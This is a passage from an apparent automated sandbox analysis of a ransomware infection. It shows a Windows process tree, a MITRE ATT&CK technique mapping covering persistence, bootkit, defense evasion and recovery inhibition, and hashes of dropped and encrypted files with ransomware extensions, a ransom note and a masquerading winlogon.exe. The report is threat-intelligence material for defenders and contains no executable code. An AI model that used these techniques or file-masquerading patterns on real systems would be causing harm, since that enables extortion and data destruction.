                                                                                                                                                                                                                                                "C:\Windows\system32\rundll32.exe" display.dll,ShowAdapterSettings 0
                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                  PID:9388
                                                                                                                                                                                                                                                  • C:\Windows\System32\DeviceProperties.exe
                                                                                                                                                                                                                                                    "C:\Windows\System32\DeviceProperties.exe" 1705622 "PCI\VEN_1234&DEV_1111&SUBSYS_11001AF4&REV_02\3&11583659&0&08"
                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                      PID:7148
                                                                                                                                                                                                                                                    • C:\Windows\System32\DeviceProperties.exe
                                                                                                                                                                                                                                                      "C:\Windows\System32\DeviceProperties.exe" 1705622 "PCI\VEN_1234&DEV_1111&SUBSYS_11001AF4&REV_02\3&11583659&0&08"
                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                        PID:1648
                                                                                                                                                                                                                                                      • C:\Windows\System32\DeviceProperties.exe
                                                                                                                                                                                                                                                        "C:\Windows\System32\DeviceProperties.exe" 4196092 "DISPLAY\RHT1234\4&27B1E55B&0&UID0"
                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                          PID:14804
                                                                                                                                                                                                                                                        • C:\Windows\System32\DeviceProperties.exe
                                                                                                                                                                                                                                                          "C:\Windows\System32\DeviceProperties.exe" 1705622 "PCI\VEN_1234&DEV_1111&SUBSYS_11001AF4&REV_02\3&11583659&0&08"
                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                            PID:15152
                                                                                                                                                                                                                                                        • C:\Windows\system32\AUDIODG.EXE
                                                                                                                                                                                                                                                          C:\Windows\system32\AUDIODG.EXE 0x494 0x4a8
                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                            PID:13380
                                                                                                                                                                                                                                                          • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                                                                            "C:\Windows\system32\rundll32.exe" display.dll,ShowAdapterSettings 0
                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                              PID:15560
                                                                                                                                                                                                                                                              • C:\Windows\System32\DeviceProperties.exe
                                                                                                                                                                                                                                                                "C:\Windows\System32\DeviceProperties.exe" 5440292 "ROOT\BASICDISPLAY\0000"
                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                  PID:15700

                                                                                                                                                                                                                                                              Network

                                                                                                                                                                                                                                                              MITRE ATT&CK Matrix ATT&CK v13

                                                                                                                                                                                                                                                              Execution

                                                                                                                                                                                                                                                              System Services

                                                                                                                                                                                                                                                              1
                                                                                                                                                                                                                                                              T1569

                                                                                                                                                                                                                                                              Service Execution

                                                                                                                                                                                                                                                              1
                                                                                                                                                                                                                                                              T1569.002

                                                                                                                                                                                                                                                              Windows Management Instrumentation

                                                                                                                                                                                                                                                              1
                                                                                                                                                                                                                                                              T1047

                                                                                                                                                                                                                                                              Scheduled Task/Job

                                                                                                                                                                                                                                                              1
                                                                                                                                                                                                                                                              T1053

                                                                                                                                                                                                                                                              Command and Scripting Interpreter

                                                                                                                                                                                                                                                              1
                                                                                                                                                                                                                                                              T1059

                                                                                                                                                                                                                                                              Persistence

                                                                                                                                                                                                                                                              Create or Modify System Process

                                                                                                                                                                                                                                                              3
                                                                                                                                                                                                                                                              T1543

                                                                                                                                                                                                                                                              Windows Service

                                                                                                                                                                                                                                                              3
                                                                                                                                                                                                                                                              T1543.003

                                                                                                                                                                                                                                                              Boot or Logon Autostart Execution

                                                                                                                                                                                                                                                              3
                                                                                                                                                                                                                                                              T1547

                                                                                                                                                                                                                                                              Registry Run Keys / Startup Folder

                                                                                                                                                                                                                                                              2
                                                                                                                                                                                                                                                              T1547.001

                                                                                                                                                                                                                                                              Winlogon Helper DLL

                                                                                                                                                                                                                                                              1
                                                                                                                                                                                                                                                              T1547.004

                                                                                                                                                                                                                                                              Pre-OS Boot

                                                                                                                                                                                                                                                              1
                                                                                                                                                                                                                                                              T1542

                                                                                                                                                                                                                                                              Bootkit

                                                                                                                                                                                                                                                              1
                                                                                                                                                                                                                                                              T1542.003

                                                                                                                                                                                                                                                              Scheduled Task/Job

                                                                                                                                                                                                                                                              1
                                                                                                                                                                                                                                                              T1053

                                                                                                                                                                                                                                                              Privilege Escalation

                                                                                                                                                                                                                                                              Create or Modify System Process

                                                                                                                                                                                                                                                              3
                                                                                                                                                                                                                                                              T1543

                                                                                                                                                                                                                                                              Windows Service

                                                                                                                                                                                                                                                              3
                                                                                                                                                                                                                                                              T1543.003

                                                                                                                                                                                                                                                              Boot or Logon Autostart Execution

                                                                                                                                                                                                                                                              3
                                                                                                                                                                                                                                                              T1547

                                                                                                                                                                                                                                                              Registry Run Keys / Startup Folder

                                                                                                                                                                                                                                                              2
                                                                                                                                                                                                                                                              T1547.001

                                                                                                                                                                                                                                                              Winlogon Helper DLL

                                                                                                                                                                                                                                                              1
                                                                                                                                                                                                                                                              T1547.004

                                                                                                                                                                                                                                                              Scheduled Task/Job

                                                                                                                                                                                                                                                              1
                                                                                                                                                                                                                                                              T1053

                                                                                                                                                                                                                                                              Defense Evasion

                                                                                                                                                                                                                                                              Modify Registry

                                                                                                                                                                                                                                                              7
                                                                                                                                                                                                                                                              T1112

                                                                                                                                                                                                                                                              Impair Defenses

                                                                                                                                                                                                                                                              2
                                                                                                                                                                                                                                                              T1562

                                                                                                                                                                                                                                                              Disable or Modify Tools

                                                                                                                                                                                                                                                              1
                                                                                                                                                                                                                                                              T1562.001

                                                                                                                                                                                                                                                              Disable or Modify System Firewall

                                                                                                                                                                                                                                                              1
                                                                                                                                                                                                                                                              T1562.004

                                                                                                                                                                                                                                                              Indicator Removal

                                                                                                                                                                                                                                                              2
                                                                                                                                                                                                                                                              T1070

                                                                                                                                                                                                                                                              File Deletion

                                                                                                                                                                                                                                                              2
                                                                                                                                                                                                                                                              T1070.004

                                                                                                                                                                                                                                                              File and Directory Permissions Modification

                                                                                                                                                                                                                                                              1
                                                                                                                                                                                                                                                              T1222

                                                                                                                                                                                                                                                              Pre-OS Boot

                                                                                                                                                                                                                                                              1
                                                                                                                                                                                                                                                              T1542

                                                                                                                                                                                                                                                              Bootkit

                                                                                                                                                                                                                                                              1
                                                                                                                                                                                                                                                              T1542.003

                                                                                                                                                                                                                                                              Credential Access

                                                                                                                                                                                                                                                              Unsecured Credentials

                                                                                                                                                                                                                                                              1
                                                                                                                                                                                                                                                              T1552

                                                                                                                                                                                                                                                              Credentials In Files

                                                                                                                                                                                                                                                              1
                                                                                                                                                                                                                                                              T1552.001

                                                                                                                                                                                                                                                              Discovery

                                                                                                                                                                                                                                                              Query Registry

                                                                                                                                                                                                                                                              7
                                                                                                                                                                                                                                                              T1012

                                                                                                                                                                                                                                                              System Information Discovery

                                                                                                                                                                                                                                                              8
                                                                                                                                                                                                                                                              T1082

                                                                                                                                                                                                                                                              Peripheral Device Discovery

                                                                                                                                                                                                                                                              3
                                                                                                                                                                                                                                                              T1120

                                                                                                                                                                                                                                                              Remote System Discovery

                                                                                                                                                                                                                                                              1
                                                                                                                                                                                                                                                              T1018

                                                                                                                                                                                                                                                              Collection

                                                                                                                                                                                                                                                              Data from Local System

                                                                                                                                                                                                                                                              1
                                                                                                                                                                                                                                                              T1005

                                                                                                                                                                                                                                                              Impact

                                                                                                                                                                                                                                                              Service Stop

                                                                                                                                                                                                                                                              1
                                                                                                                                                                                                                                                              T1489

                                                                                                                                                                                                                                                              Inhibit System Recovery

                                                                                                                                                                                                                                                              2
                                                                                                                                                                                                                                                              T1490

                                                                                                                                                                                                                                                              Defacement

                                                                                                                                                                                                                                                              1
                                                                                                                                                                                                                                                              T1491

                                                                                                                                                                                                                                                              Replay Monitor

                                                                                                                                                                                                                                                              Loading Replay Monitor...

                                                                                                                                                                                                                                                              Downloads

                                                                                                                                                                                                                                                              • C:\Program Files\7-Zip\7zFM.exe
                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                1.3MB

                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                d3f7d65fa2c57dd6d08fae948991a3f4

                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                03bac746d4fc21dba09b9f4be3eb27b6f2547e90

                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                c198fa52d7c40352e82778e857fe1d14a995177399357981851c9b3ea0666027

                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                5959c48e6ca320be07a0e33d5214ac6284628432a4d6f76cfab8e9ddee934c6bef72870f3e4b742a9520e8e390c643c8bcb18037e2714879fc08f2ab30428f5d

                                                                                                                                                                                                                                                              • C:\Program Files\Common Files\microsoft shared\ClickToRun\AppvIsvSubsystems32.dll.id-DE44B1C0.[[email protected] ].wiki
                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                2.7MB

                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                8f5b494521f8e0442c628ed61861db34

                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                8fab69edb7b9417b330af9d5f75b2188f193402f

                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                a9f74e27e45b622f6835b3db8071aaf4668021d5e5860f8d264161e7dd63ed2a

                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                7ea2e5ecc6429a4654812ab5da15184c47f64d5262848088be8790bc63cf5fa1a873d23df0c064f0b21ebf0abc40b7733e2919080d7d86f41ed4bba706c38eb3

                                                                                                                                                                                                                                                              • C:\ProgramData\Adobe\# SATAN CRYPTOR #.hta
                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                4KB

                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                969c0aedc65d25da1c68779f0ccfe8d9

                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                ed9a8a322dfd334c590a7cbc9399cb8c8e491493

                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                a1f3cc004b476c218fa68d21ae8842f28a8f9279b0e581aceadea6c6d7e951c4

                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                992f6c2c0c3eeb2b9bb6d2193febb457573be49e854401697bee787a4f33aa65184dbcb19187ca7f72ef0884319dca54b8d84aba6faa2a1d4bc28776f2a1cf16

                                                                                                                                                                                                                                                              • C:\ProgramData\Microsoft\Diagnosis\DownloadedSettings\utc.allow.json.id-DE44B1C0.[[email protected] ].wiki.secure[[email protected]]
                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                2.7MB

                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                9f155d2a5db2b79fffb0e9c4abccb644

                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                44351bbf45e77b300bbc008341ebe8475abecbe7

                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                b39ab8ed89d4f95765b2b64603e96fcb94e5823ae94b1b8627a7805bcb102a2b

                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                f3ce218f17e9c02333294ddd97141351b87f8cf844b6aad2ded3367a9752a82ee1037356adb8bd2befb6d81620769fb447e65aa7c50c206affc1893647cf3f94

                                                                                                                                                                                                                                                              • C:\ProgramData\Microsoft\User Account Pictures\Admin.dat.CoronaCrypt[[email protected]]-[ID-024666B1].Encrypted
                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                16B

                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                ca08f683720996068a01a76722ad4879

                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                170f858cdb58c5738d38f91321002bc7337f2bd7

                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                019646c62b87957b499e596d215c1d2b3483a3cd6c99e648e2b3ab061efc8fe1

                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                138da31cdca9737616e7dcf651a033219cda6dd813810400b4e2660a45289bc8dce6d102f24b8f9e0241b03bc3fcb3c344e8f2823ffa9b9ab36b3e4666237f82

                                                                                                                                                                                                                                                              • C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\cc3b570fa8f87354f06a20d8873c45087684c217f1b434b3b0048acd96fe3e64.exe
                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                1.9MB

                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                f09a781eeb97acf68c8c1783e76c29e6

                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                ec2b7eebfcbf263424ae194817060eac44c380c7

                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                cc3b570fa8f87354f06a20d8873c45087684c217f1b434b3b0048acd96fe3e64

                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                972fc4759d344c3eab157fe8bb345596592895ab9d27546961a93047142e8236dd876f3449a9f60dd5eb93a54035dcd3d7c8d70d468e3233341bfa4d674cfa64

                                                                                                                                                                                                                                                              • C:\ProgramData\Package Cache\{2BB73336-4F69-4141-9797-E9BD6FE3980A}v64.8.8795\dotnet-host-8.0.2-win-x64.msi.CoronaCrypt[[email protected]]-[ID-024666B1].Encrypted.secure[[email protected]]
                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                728KB

                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                ca6bfca8247889af07a5ecc4d69e59ca

                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                6e84574c4fdaa2131c3194790575e68e99e04f7c

                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                43bd475a2bf31cf1cd9ce0350f6e294826bd774bb67619ea45561e0ac9979bd3

                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                d439b15e0153338b986229ce5bd77c0a21b2c20188a79f11f029b7af1edee40d4d370e8c8dec3be6de5ade8da3e514fc1e7b55b519d220d967347725b8534e94

                                                                                                                                                                                                                                                              • C:\ProgramData\Package Cache\{9F51D16B-42E8-4A4A-8228-75045541A2AE}v56.64.8781\dotnet-host-7.0.16-win-x64.msi.CoronaCrypt[[email protected]]-[ID-024666B1].Encrypted
                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                744KB

                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                47be3b3b415cd691c08137a9681af0c5

                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                14e7b5dca8e32726a17b00cf8d564439a80b4ef4

                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                665f9ce4434c991ab47dc9595864975cc00e691dd01d0f5bed04755774005ce9

                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                22e16ed3cd7ca80ca79def4fdafeb50c02fea9f2c10d426c07caf639f6f16184a8096dc5cc2f608b68c445da5b86dcda707ad58597d838c9c03b3a7edc8786cd

                                                                                                                                                                                                                                                              • C:\ProgramData\Package Cache\{BF08E976-B92E-4336-B56F-2171179476C4}v14.30.30704\packages\vcRuntimeAdditional_x86\vc_runtimeAdditional_x86.msi.secure[[email protected]]
                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                180KB

                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                4e95b515ec4eda4861563290c18fcfa5

                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                dc6bad265a1c80d9a1b30759c948e3bb6d1adf18

                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                2ea70f51a679e55d200d08b63c2c5cb5e8b2386106d1a5331d7007bd06b5d4ad

                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                9fbdf1d5db908aec19bb48e973b31b89c0f3256495a75e1a632fa387102b8e5bf6088d8acabcf2b2d683f0ecd8e146b9262e243a2b8cbe27d0fc74a9e4c2d063

                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                152B

                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                eaa3db555ab5bc0cb364826204aad3f0

                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                a4cdfaac8de49e6e6e88b335cfeaa7c9e3c563ca

                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                ef7baeb1b2ab05ff3c5fbb76c2759db49294654548706c7c8e87f0cde855b86b

                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                e13981da51b52c15261ecabb98af32f9b920651b46b10ce0cc823c5878b22eb1420258c80deef204070d1e0bdd3a64d875ac2522e3713a3cf11657aa55aeccd4

                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                152B

                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                4b4f91fa1b362ba5341ecb2836438dea

                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                9561f5aabed742404d455da735259a2c6781fa07

                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                d824b742eace197ddc8b6ed5d918f390fde4b0fbf0e371b8e1f2ed40a3b6455c

                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                fef22217dcdd8000bc193e25129699d4b8f7a103ca4fe1613baf73ccf67090d9fbae27eb93e4bb8747455853a0a4326f2d0c38df41c8d42351cdcd4132418dac

                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                6KB

                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                48c0d641bb44a6cd9445363f681a3418

                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                58a63b357bcd66c11b6fe0cfd23de993ad924805

                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                af2db57f0ebe1b711fd792973a16abb8b9db70427b9e1571f5564b8f8b3fbe00

                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                b0c9c75a1beb7c79311faa6321fd05e9538c9151ee491aeb98536647ea09b4813bdf889223a3c4be2246293f49f3af562a913ee4d7b191bb5734098d3ad898c4

                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                5KB

                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                d0fd04b1a10f177a2f0a871bf6262b73

                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                2b7558488c468c429e3f942eb6bd8ade8473e733

                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                13ea55fc25854c31cda6aeddf64f7efa5a6def2e1ceaccc965b225dab5afd490

                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                5a161921937286319b10c12d5a2ac6fc45cc0a0010de6a271678003073ef7d7dcb1b592ebb4ac0a4054c6a907ec1bf71254b5a82023f1fdd2a4c7c597d3abbfd

                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                5KB

                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                55b0b726a4e32616876c278da5afb4f6

                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                3e70a83f829e3c2113046e22d08e2ac684a260e5

                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                739a479a012c162f74fa1cf65b339d71dde226c2b305e9aaaf61778c7449f5da

                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                eb6f625367ecf1a52caee4d9d0fabdfd67d3b962f6909da3b184b0cb10e454045578a410b03ed98380528696768d4ebe45d183151effc44eeb34f77c6e2913e5

                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                8KB

                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                01d813284528cfae2a62b2bf0a982097

                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                04fba12b200b7f66ceb694a0a5a864c97a549f12

                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                0ddaa78176673bb3a2cc273dcdda490d7705579937f945770e09507d5a3db16b

                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                be9f6c770ced1b5b2a7f49c761dbb57606712383c71b0e1540606a76ebe40093ee00083c1bd651f482f14160b211c946deb9548c6cd1b0c2bce16958e9249d97

                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                8KB

                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                8aad112d14e35747ef445795026e2d94

                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                ad8c57d700027223744ac712b701b663852a2ab5

                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                ce10c9c53efae4ca81e7c8260fe5b274c0ccf38efe92ad9d624ac2b0dd99c2a4

                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                8a39e01fe62103b8168bb896f4ecbb051dd7300526d138284562a7e05c6cd6e373b8d0d5d5bb39bf1f256f9d5336ae460f0cbc96c546cc76e7b69a5ae6e8b470

                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                8KB

                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                b192db980fb2f8fb74888285c977d2a5

                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                000149ce529ef9a82e470d4bd219a4d921a934cd

                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                01212bb0c5e37baff4a70a9a45dcd1554769447063ccbf1bf5a4688328ff7ec5

                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                ac6bce8b855f4e21574700c05b7ff28704726a0a1c62ba14733de15c2e201a79cee2ab0d73c12c2e6d432f5fa8d0eb55bd26179e6d925e5a825669250d19a308

                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\ShaderCache\GPUCache\data_1
                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                264KB

                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                f50f89a0a91564d0b8a211f8921aa7de

                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                112403a17dd69d5b9018b8cede023cb3b54eab7d

                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec

                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58

                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\9psrvhryUdb.txt
                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                2KB

                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                2e5e88f1fe6fda07ccfa8db4d25c044b

                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                21a426b0597a03eeffe5a247f398766c7455176b

                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                738e0479715efb27a03d66f97a3df447c046cea458ec5d80f92ecc519418368e

                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                af6430b2c975f46c3a028b8a3f385c877d983dd8bfee18ed47b04b293f57223019cdaa728363c8c3bf49dc077840c32be04567f4f027ee8cd4356c6edf92c12c

                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ewcwntyq.qsi.ps1
                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                60B

                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                d17fe0a3f47be24a6453e9ef58c94641

                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\fnsmluchag.log
                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                288B

                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                28abc2f82690f29998d932398b3d197d

                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                812e777e378a3b6a56bdb7e8ac1b9cb31f9dccfe

                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                60b9b7be34c2be308d06872084a0ff43ae0a3d803315f083d61f3b70b5f961be

                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                6b9c41be04d1cc459a089cf0cbde400f5f84ad8070db021471daac4a6748894215cdc75eef9e606dd45f5edee69ab48f4ed05377fb078b8fc15d51f26b8cbeb4

                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\zincite.log
                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                320B

                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                722ae03d8a5eff540817c43fdc6523b2

                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                94682db23111b188254cce011cc54e9074da3441

                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                4eebc1d058b8a2e5375f24b7e4a7cd7d58e172e76f71cb53551d03336d5b0207

                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                2c1795ee9af1d0ec9944f2484ae74b4cdad799e877dc2121a6b7f20d3c496a8b0fb00d98da876ce2557e9b0da279d69e59aa72970a2107c95f5cafc2726560ce

                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\zincite.log
                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                1KB

                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                ae443b038bbbe465cc7f68a87bab12bd

                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                d0731eddca334870390fbe826baa8db956cbcdf4

                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                3716d14ad4220cd7996f50d9770cf52042118432f5b525bcc32787cb49312bff

                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                07d86776ebb849297ce8231918a197d156257c8a6ac77ad36ccc51dd3b7f27531f2e87e7e02ec94fe7b4d49b8832bbc7cc8334e5b367999ee7cd96eaf5135d0b

                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\zincite.log
                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                1KB

                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                53f52a8c6cc08890914811c663a67f8d

                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                220c5e8404793c4220637d862399ba165302246d

                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                64c0d47f76827d792e0b50222082d7f78aa58fc262f194148f6f363275f4216f

                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                faf8f7c366e0d7510cf25b0f78f956961308d4446cf1c40a2165c886b93bd333709d9387ac7bb72eff878f6c477ed772a0ae7e874dcc93694dfe3282276fe82c

                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\winlogon.exe
                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                492KB

                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                63acb0fc42adddeefed36db5b1ad61bb

                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                7ffe0a6043397f55fd794971cac56a79fc564c0a

                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                84ee7e5c055fd25204ca4969940292b03da9d45b5048cbb7f7ba8528b88a2859

                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                91787551107a0c013b3c5c35b9cb51f5880403a9f8dc3370f3392aba8b37fe210eda82a8bbd474f1d6ad73e969a8d6c2962278a9f0d595c8842269c27142c4c0

                                                                                                                                                                                                                                                              • C:\Users\Admin\Contacts\Restore-My-Files.txt
                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                335B

                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                d11c8c44d32382b936db0776a261e84b

                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                e2745ee7c9cb1ef67f8b776404c23b5345c64826

                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                3fb27da98219bf3c32bc45f02c3fa4079b766f1677adc0072bcf39bb7498c7cd

                                                                                                                                                                                                                                                                SHA512

